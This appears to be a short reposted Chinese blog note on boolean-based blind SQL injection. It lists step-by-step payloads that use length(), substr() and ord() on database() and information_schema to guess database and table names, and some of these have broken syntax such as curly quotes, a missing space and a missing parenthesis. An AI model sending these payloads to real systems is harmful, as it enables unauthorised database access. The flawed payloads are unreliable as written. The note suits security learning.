Boolean (布尔型) 注入攻击

其他 2020-02-29 09:50:52 阅读次数: 0
步骤:
  1' and length(database())>=1--+ //判断数据库的长度
  1' and substr(database(),1,1)=‘t’ --+ //判断数据库第一个字母的值
  1' and substr(database(),2,1)=‘q’ --+ //判断数据库的第二个字母的值
  1' and ord(substr(database(),1,1))=115--+ //利用ord和ASCII判断数据库库名
  1' and substr(database(),2,1)=’q’--+ //利用substr判断数据库的库名
  1' and substr(select table_name from information_schema.table wheretable_schema=‘sql’ limit 0,1),1,1)=‘e’ --+ //利用substr判断数据库的表名

猜你喜欢

转载自www.cnblogs.com/wxj1711652908/p/12381523.html
今日推荐
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
周排行
rbac——界面、权限
Apache CXF + SpringMVC 整合发布WebService
so插件化
Vue.js实战系列---图标字体制作(svg格式)
PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---(C语言 + 详细注释)
被IRM保护的文档,打开失败
Calendar和Date计算日期差的小问题
win10子系统ubuntu18.4安装docker
利用Wrap Shell Script定位Android Native内存泄漏
MySQL: Transaction (Part I - Basic Concept)
每日归档
更多
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022